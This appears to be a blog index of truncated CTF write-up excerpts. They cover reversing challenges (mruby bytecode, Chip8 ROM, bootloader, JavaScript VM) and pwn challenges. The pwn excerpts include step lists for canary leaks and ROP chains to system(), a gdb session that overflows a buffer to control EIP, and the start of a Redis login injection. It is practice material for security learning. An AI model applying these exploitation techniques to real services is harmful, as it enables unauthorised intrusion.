Hi,

Challenge file is here

Following is my Angr-based solver:

Hi,

I didn’t publish a CTF writeup since a while and now I’m back with a write-up which demonstrates how I solved the task in few minutes :p

We were given a web page which asks for an authentification password.
http://assemblyme.challs.malice.fr

The goal is to reverse engineer the code and figure out the correct password.

The steps I followed to solve the challenge were:

[+] Read Webpage source code
[+] Invoke the authentication function from Chrome console

Hi,

European Cyber Week CTF is a contest exclusively reserved for “European” students.

I’am not eligible to play but I joined the CTF later in order to keep practicing and learn new stuff .

Red Diamond in the Binary category was the hardest task regarding the number of players who solved it (7 solves).

The given file was a Windows binary for AMD64 !

I imported the binary file into IDAPro, then, with a top-down look at the string list I saw many paths to mruby header files such as /home/FlL/mruby1.3.0/mruby/include/mruby/value.h

I “googled” mruby. It is a lightweight implementation of the Ruby language. From this point I figured out that my mission will be hard because I never wrote a single line of ruby code. But remember that my goal is to learn new stuff ! So ! Let’s do it !

Mruby can be linked and embedded within an application, which is the case. In addition, Ruby programs can be compiled into byte code using the mruby compiler.

Typically the challenge file is an application embedding a mruby bytecode and an interpreter.

I spent some time reading about MRB file format and RiteVM.

MRB file starts with RITE00… as magic number. I searched that pattern inside the binary and, yes !, I found it.

The bytecode program starts from offset 0x80A20 in the file (0x100482020 offset in memory)

I dumped the bytecode to a red_diamond.mrb file.

Mruby package provides an interpreter program “mruby”. I downloaded mruby sources and I compiled it.

Hi,

Typically this was not really a web task but a reversing one instead. The task implements a relatively small and straightforward custom VM interpreter using Javascript.

crackme! http://95.85.55.168/vmctf.html_

Here is my solver in case you want to skip the explanation:

Hi,

The task worths 360 pts. I was the first solver to earn bonus points, but, I didn’t like the fact of releasing hint few hours before the end of the CTF, since there were few teams already solved the challenge without hints and with a lot of guessing and this is totally unfair.

The hardest part of the challenge was to determine the target architecture of the provided binary file.

The given binary is a Chip8 ROM file. This information was not mentioned in the task statement, however the task title gave me a hint about the target CPU.

Disassemble the binary with a Chip8 disassembler:

Hi,

This is a quick and dirty writeup for realism task.

The binary is a 16-bits bootloader.

The flag checking function is based on PSADBW instruction.

According to documentation, the instruction computes the absolute value of the difference of 8 unsigned byte integers from the source operand (second operand) and from the destination operand (first operand). These 8 differences are then summed to produce an unsigned word integer result that is stored in the destination operand.

In the given program the instruction operates on xmm2 and xmm5 registers.

When operating on 128-bit operands, two packed results are computed. Here, the 8 low-order bytes of the source and destination operands are operated on to produce a word result that is stored in the low word of the destination operand, and the 8 high-order bytes are operated on to produce a word result that is stored in bits 64 through 79 of the destination operand. The remaining bytes of the destination operand are cleared.

Then the computed sum of absolute differences are compared against excpected result. 2 chars are compared at one time.

Following is my solver:

Hi,

This time I will just publish the exploits I wrote to solve the tasks.

The QUIZZZZ - Pwn350

1. Leak Canary Value
2. Leak Stack Address (2 bytes)
3. Brute force the remaining byte
4. ROP chain to run a commande

Hello,

We were given a program which is pretended to print the flag by the end of its execution. The first run prints that it will takes days to finish the execution. The question to answer is, what makes it take this too much time ? The quick answer is simple operations such as multiplication, division, modulo,exponentiation…are made using loops. The program has several functions such as um(),feliz(),natal(), ano()… each function is responsible for a specific operation.

The job is simply to analyse function by function, figure out what it does and simplify it using arithmetic operators or optimized functions.

For example let’s start with um() function

Hello,

This writeup will be quick and dirty. The idea behind the challenge is about guessing a random generated password to win the game and get a shell. You lose the game after 3 bad tries.

I spent much time reversing the binary, to figure out how the password is generated, because this is the first time I deal with a Position Independent Executable.

Well, to solve the task all what we need is to guess the value used to seed the random number generator. Like this we can determine the generated password.

The seed is calculated based on current time stamp and current process id. We don’t know the pid. We have to bruteforce it. But we have only 3 tries !. Easy ! just overflow the “tries” variable buffer in stack to get infinite tries. That’s all !

Here is the exploit. Don’t ask me why I wrote it in C !

Hello,

In this task we were given a shared library “SecretLabXLib.so” and a zip file containing an encrypted and a plain jpeg files.

Task description:

There was some photos of unknown experiment taken in a secret lab-X for they internal archive. After that the device from which the shot was made, immediately load crypto-trigger, whose function – to ensure the confidentiality of image data (this is exactly how it should be in a super-secret laboratories?).

It is known that, due to some floating code errors, the trigger has not completed his work and not all the photos was encrypted.

We managed to get a binary, which has something to do with that crypto-trigger software.

And now we have a good chance to find out what secrets hides laboratory-X.

The first step I did is printing the symbol table of the shared library to figure out what functions are exported.

Analyzing the shared object

By running objdump -T I got mangled symbols name. De-mangling can be done using nm -C.

Hello,

In this task we were given a binary file with NX activated, Canary present and ASLR enabled on the remote server.

The first function prints the address of puts function in libc. (-0x500).

The second function prints the canary and a part of a stack address (4 bytes).

With Libc given in addition to all these leaked informationwe can rebuild the process layout in memory and build our payload.

Below is the exploit I wrote to pwn the service, the script process as follows:

• Leak puts() address.
• Calculate system() address.
• Leak Canary value.
• Leak a Stack address.
• Calculate the receive buffer address.
• Place the command to be executed in recieve buffer.
• Place the canary
• ROP to system with recieve buffer address as argument.
• Put all together
• Enjoy !

Hi,

Well, my team Pwnium finished #4th in this CTF. We missed only one Stego task. The CTF was great and a lot of original tasks have been proposed. I decided to make a writeup for Slickerserver task in pwn category since it was the hardest one and worthed 300 points.

In this task we were given a binary file named asmttpd (referring to https://github.com/nemasu/asmttpd) which is a HTTP server for Linux written in assembly.

The source code was modified to add a kind of backdoor which leaves a buffer overlow vulnerability. To exploit the vulnerability you have to satisfy certain condition in a hmac function to take control over the program.

Let’s start analyzing the binary.

When you import the binary into IDApro, you can easily figure out that the program uses system calls instead of libraries in order to do networking, threading and file system operation stuff.

The program sets up the webroot directory specified as argument then it starts listening for incoming connections in port 6601. For each accepted client a worker_thread is created.

Hi, I’m member of Pwnium tunisian CTF team. We were ranked #31 in this CTF because we played only 2 guys. I hope we will do better next CTF ;)

This task was the 4th level of the Crack series tasks of NDH. The previous levels were quiet easy except the last level which was tricky(as they said).

file stage4.bin
stage4.bin: DOS/MBR boot sector

Hi,

I’m member of Pwnium tunisian CTF team. We were ranked #31 in this CTF ! Nice rank for a team of 2 members right ?

I hope we will do better next CTF ;)

The binary file takes a filename as argument and checks if the file size is less than 4096 then dumps its content to a buffer otherwise the program prints an error message.

Using GDB let’s try to let the program accept a big filesize. To do this I changed the value returned by the check_size function to 1.

(python -c 'print "A"*4200') > /tmp/big
gdb pwn
gdb-peda$ b *0x08048F1A
gdb-peda$ r /tmp/big
gdb-peda$ set $eax=1
gdb-peda$ c
Stopped reason: SIGSEGV
0x41414141 in ?? ()
gdb-peda$ i r eip
eip 0x41414141 0x41414141

Hello,

The task was about bypassing a challenge response authentication system, without having access to the library that check the submittet response. The first run of the binary gives a message telling that the libchallengeresponse.so is missing.

The task :

We encrypted an image that we drew in paint, but lost the original! Can you recover it for us?
Challenge file

First the program is compiled under Win8 using new Win8 API, so it can be executed only under Win8 or in some cases Wine. I don’t have a Win8 machine so I tried to write a program that uses the Crypt DLL to perform encryption.

The encryption function signature is the following:

void encrypt(unsigned int8[] file, int32 length, unsigned int8[] key, int32 keylen);

In our case the image file is encrypted using a 54 bytes key length.

Hi !

On executing the file, the process will be duplicated 400 times. Each process creates its child by a command line that contains 3 arguments. The first and second arguments are numbers used in a hashing function and used also to generate the next process arguments. The third argument is the process number. So, the task typically is about finding which child process contains the flag (or what are the corrects args to pass to the program). My approach to solve the tass was first to generate the correct arguments sequence numbers, then try to pass them to the hashing function “sub_401070” with a string at .text:00401149 , and try to figure out the result.

Hi !

Challenge WEB200 “Hipster NoSQL hangout” We found a place where the hipster NoSQL admins hang out and share their secrets. We understood this new cutting edge technology is very secure, can you break in?

By googling these commands (listed in the login page) we can identify the database system used.

PSUBSCRIBE, PUBSUB, PUBLISH, PUNSUBSCRIBE, SUBSCRIBE, UNSUBSCRIBE, DISCARD, EXEC, UNWATCH, WATCH, MULTI, EVAL, EVALSHA, ECHO, BGREWRITEAOF, BGSAVE, CLIENT, CONFIG, DEBUG, MONITOR, SAVE, SHUTDOWN, SLAVEOF AND SLOWLOG

It is Redis (REmote DIctionary Server) a key store.

Now we inject some values in the login form, the couple foo/bar give “User not found”